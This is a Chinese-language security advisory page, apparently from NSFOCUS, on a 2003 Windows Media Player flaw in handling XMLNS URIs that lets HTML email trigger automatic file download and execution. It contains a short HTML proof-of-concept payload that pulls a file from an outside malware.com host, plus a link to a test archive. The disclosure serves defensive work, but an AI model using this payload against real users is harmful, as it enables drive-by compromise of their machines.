首页 -> 安全研究

安全研究

安全漏洞
Microsoft Windows Media Player自动文件下载和执行漏洞

发布日期:2003-05-21
更新日期:2003-05-27

受影响系统:
Microsoft Windows Media Player 7.1
Microsoft Windows Media Player 7
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
不受影响系统:
Microsoft Windows Media Player 9.0
描述:
BUGTRAQ  ID: 7640

Windows Media Player是一款Microsoft开发和维护的媒体播放器。

Windows Media Player在处理XMLNS URI时存在问题,远程攻击者可以利用这个漏洞使Windows媒体播放器自动下载和执行文件。

攻击者可以在HTML邮件消息中嵌入精心构建XMLNS(XML Name Space)URI,结合'Microsoft Windows Media Player文件附件脚本执行漏洞'( http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=3370 ),当有此漏洞的用户浏览时,可导致下载和执行攻击者指定的文件。

<*来源:http-equiv (http-equiv@malware.com
  
  链接:http://marc.theaimsgroup.com/?l=ntbugtraq&m=105354068232112&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http-equiv (http-equiv@malware.com)提供了如下测试方法:

MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03  http://www..malware.com

<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://www.malware.com/freek.asf"  />
</body></html>

从如下地址下载测试程序:

http://www.malware.com/but.its.free.zip

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

浏览次数:3335
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障